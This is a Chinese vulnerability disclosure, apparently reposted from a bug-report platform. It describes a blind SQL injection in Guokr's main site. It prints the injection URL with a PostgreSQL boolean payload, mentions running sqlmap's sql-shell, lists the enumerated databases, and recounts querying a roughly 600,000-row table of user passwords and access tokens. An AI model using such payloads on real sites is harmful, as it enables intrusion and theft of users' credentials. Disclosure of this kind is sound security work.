简单的看看主站,结果发现了一个注射,PostgreSQL的!
看到了个用户信息,密码和access_token的表。。。
详细说明:注射点:
http://HdhCmsTestguokr测试数据/group/posts/38/members/index.php?wd=123'%20and%20(SELECT%20COUNT(DISTINCT(datname))%20FROM%20pg_database)%3E5%20and%20'a'='a
盲注,用sqlmap的sqlshell跑跑
挺高的版本。
available databases [6]:
[*] backend
[*] postgres
[*] watson
[*] youth
没什么太有价值的东西,准备闪人的时候又like一下含有password字段的表,结果就这一次查询,改变了检测结果。
user_alias这个表里有啥?
此表记录数量:
60多万额,,
查询5条出来
HdhCmsTest2cto测试数据
结束,今天到这里,感觉问题不是单独存在的,这次这个点稍微有点难利用。两个在zone看到的PostgreSQL技巧也没用上,惭愧啊。
修复方案: 字符型注射检测。
查看更多关于果壳主站SQL注射,可获取站内用户数据 - 网站安的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did13220